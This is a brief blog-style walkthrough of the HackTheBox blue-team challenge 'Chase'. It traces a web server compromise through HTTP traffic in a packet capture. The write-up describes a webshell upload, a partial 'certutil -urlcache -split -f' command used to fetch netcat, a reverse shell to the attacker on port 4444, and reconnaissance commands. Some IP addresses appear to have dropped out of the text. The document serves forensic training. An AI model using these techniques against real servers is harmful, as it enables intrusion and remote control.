HTB: Intro to Blue Team: Chase

Michael Koczwara
3 min readSep 27, 2021


One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?

Attack Analysis is an attacker and is the webserver

Filtering for HTTP traffic to make it clear.

HTTP Traffic

First GET HTTP Requests and Responses from webserver

An attacker uploaded a webshell first (authKey=admin).

An attacker executed a command line and downloaded netcat via certutil.

certutil -urlcache -split -f

Now we can see netcat running on the webserver connecting back to an attacker machine over port 4444

An attacker executed whoami, ipconfig commands on the webserver.

Michael Koczwara